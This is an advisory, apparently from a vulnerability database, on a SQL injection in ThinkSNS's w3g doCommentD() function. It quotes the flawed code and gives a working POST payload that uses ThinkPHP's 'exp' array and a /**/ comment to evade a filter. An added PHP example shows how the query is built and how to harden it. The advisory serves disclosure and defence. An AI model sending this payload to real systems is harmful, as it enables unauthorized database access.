ThinkSNS SQL injection via filter bypass

Published: 2025-04-13
Revised: 2025-04-13

### Summary:

SQL injection in ThinkSNS that bypasses the application's input filtering.

### Details:

In `doCommentD()` (app `w3g`, module `Index`) the `rowid` and `content` parameters are checked, but `comment_id` is copied from `$_POST` straight into the query condition array without any type check:

```php
public function doCommentD(){
    if ( ($feed_id = intval($_POST['rowid'])) <= 0 ) {
        // $this->redirect(U('w3g/Index/index'), 3, '参数错误');
        echo '参数错误';   // "invalid parameter"
        exit;
    }
    if ( empty($_POST['content']) ) {
        // $this->redirect(U('w3g/Index/detail',array('feed_id'=>$feed_id)), 3, '内容不能为空');
        // return ;
        echo '内容不能为空';   // "content must not be empty"
        exit();
    }
    // the original post being commented on
    $map['comment_id'] = $_POST['comment_id'];   // taken as-is: may be an array
    $preComment = M('Comment')->where($map)->find();
    // ...
}
```

Because `comment_id` is never cast to an integer, the client can submit it as an array. ThinkPHP's `where()` treats a two-element array whose first element is `exp` as a raw expression and splices the second element into the WHERE clause unescaped, so `comment_id[0]=exp&comment_id[1]=...` hands the attacker direct control over part of the SQL text. The `/**/` in `sleep/**/(5)` is an inline MySQL comment: it separates `sleep` from the opening parenthesis so a pattern-based filter looking for `sleep(` does not match, while MySQL still parses it as a function call. The trailing `#` comments out the rest of the query. A response delayed by about five seconds confirms that the injected expression was executed (time-based blind injection).

Request URL:

```
http://localhost/ThinkSNS_V3.1_20131108_28822/index.php?app=w3g&mod=Index&act=doCommentD
```

POST data:

```
rowid=1&content=xxxxxx&comment_id[0]=exp&comment_id[1]=%3d1)) or sleep/**/(5)#
```

### Proof of vulnerability:

Screenshot from the original report:

![1.png](https://images.seebug.org/upload/201501/291828485767c73bab628ebf4e2cdf81049a093a.png)
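The following is an added example and is not code from ThinkSNS or ThinkPHP. It models only as much of ThinkPHP 3.x's `where()` array handling as is needed to show how the request above turns into raw SQL (the `exp` branch, which splices `(field <expression>)` into the WHERE clause; `addslashes()` stands in for the framework's own quoting), and puts the hardened handling of `comment_id` next to the vulnerable one. The table name `ts_comment`, the function names and the request arrays are assumptions made for this example.

```php
<?php
// Added example, not ThinkSNS or ThinkPHP code.
// buildWhere() is a simplified model of ThinkPHP 3.x parseWhereItem(): it keeps
// only the 'exp' branch and the plain scalar branch, which is all this bug needs.

function buildWhere(array $map): string
{
    $parts = [];
    foreach ($map as $field => $val) {
        if (is_array($val) && isset($val[0]) && strtolower((string) $val[0]) === 'exp') {
            // ThinkPHP 3.x: a ['exp', '<sql>'] pair is spliced in verbatim as (field <sql>).
            $parts[] = '(' . $field . ' ' . $val[1] . ')';
        } else {
            // Scalar values are quoted; addslashes() stands in for the framework's escaping.
            $parts[] = $field . " = '" . addslashes((string) $val) . "'";
        }
    }
    return 'WHERE ( ' . implode(' AND ', $parts) . ' )';
}

// Vulnerable: the POST value is assigned to the condition map as-is, arrays included.
function vulnerableQuery(array $post): string
{
    $map = ['comment_id' => $post['comment_id']];            // what doCommentD() does
    return 'SELECT * FROM ts_comment ' . buildWhere($map) . ' LIMIT 1';   // ts_comment: assumed table name
}

// Hardened: refuse arrays and anything that is not a positive integer before where() sees it.
function safeCommentId($raw): int
{
    if (is_array($raw)) {
        throw new InvalidArgumentException('comment_id must be a scalar');
    }
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        throw new InvalidArgumentException('comment_id must be a positive integer');
    }
    return $id;   // an int can never reach the 'exp' branch
}

function hardenedQuery(array $post): string
{
    $map = ['comment_id' => safeCommentId($post['comment_id'] ?? null)];
    return 'SELECT * FROM ts_comment ' . buildWhere($map) . ' LIMIT 1';
}

// Constructed request bodies: the report's payload (URL-decoded) and a normal comment.
$attack = [
    'rowid'      => '1',
    'content'    => 'xxxxxx',
    'comment_id' => ['exp', '=1)) or sleep/**/(5)#'],
];
$normal = ['rowid' => '1', 'content' => 'hello', 'comment_id' => '7'];

echo "vulnerable, normal input:  ", vulnerableQuery($normal), PHP_EOL;
echo "vulnerable, attack input:  ", vulnerableQuery($attack), PHP_EOL;
echo "hardened, normal input:    ", hardenedQuery($normal), PHP_EOL;
try {
    hardenedQuery($attack);
} catch (InvalidArgumentException $e) {
    echo "hardened, attack input:    rejected (", $e->getMessage(), ")", PHP_EOL;
}
```

Run it with `php example.php`. For the constructed attack body the modelled builder produces `SELECT * FROM ts_comment WHERE ( (comment_id =1)) or sleep/**/(5)#) ) LIMIT 1`: the two closing parentheses in the payload balance the two the framework opened, and `#` comments out the remainder, which is why the report's payload has that shape. The hardened path never builds a query for that body, because `safeCommentId()` throws on the array; once the map value is a plain `int`, the `exp` branch is unreachable regardless of what the filter layer does or does not catch.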
